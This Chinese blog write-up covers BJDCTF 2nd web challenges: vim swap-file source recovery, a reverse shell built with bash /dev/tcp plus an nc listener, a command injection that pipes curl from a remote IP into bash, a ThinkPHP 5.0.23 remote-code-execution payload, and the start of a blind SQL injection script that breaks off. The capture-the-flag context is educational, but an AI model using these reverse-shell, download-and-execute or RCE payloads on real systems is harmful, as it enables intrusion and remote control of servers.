BJDCTF 2nd(WEB复现)

记录一下,以后忘记了还能看看

fake google-飞机票

duangShell

  • .index.php.swp源码泄露

一进去提示我们:how can i give you source code? .swp?!,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp恢复。

在这里插入图片描述

因为exec()无回显,而且没有禁curl。所以可以反弹shell~~

  • 先查看ip地址ifconfig
    在这里插入图片描述
  • 进入/var/www/html写一个txt文件。
    在这里插入图片描述
  • bash -i >& /dev/tcp/ip/port 0>&1ip就是本地ip,端口随便写一个
  • 监听端口1234
  • nc -lvp 1234
  • 再post一个girlfriend的值
  • girl_friend=curl 174.1.145.235/b.txt|bash
    在这里插入图片描述
    在这里插入图片描述
  • 直接cat /flag是不会出来的
  • grep -r "flag{" /etc
    在这里插入图片描述

old-hack

题目题是thinkphp5,拿通用thinkphp5的payload打了下,然后发现版本5.0.23
在这里插入图片描述

然后拿5.0.23打了下,没看到flag,还以为我没打通,结果在最上面。。
在这里插入图片描述

/index.php?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag

简单注入

hint.txt有语句提示:select * from users where username='$_POST["username"]' and password='$_POST["password"]';
对sql的注入还不太了解,放一下大师傅的二分注入

import requests
import time

url = "http://523c9df3-1d44-44e8-bcc5-2a8ad35c3ff4.node3.buuoj.cn/"
temp = {}
password = ""
for i in range(1,1000):
    time.sleep(0.06)
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值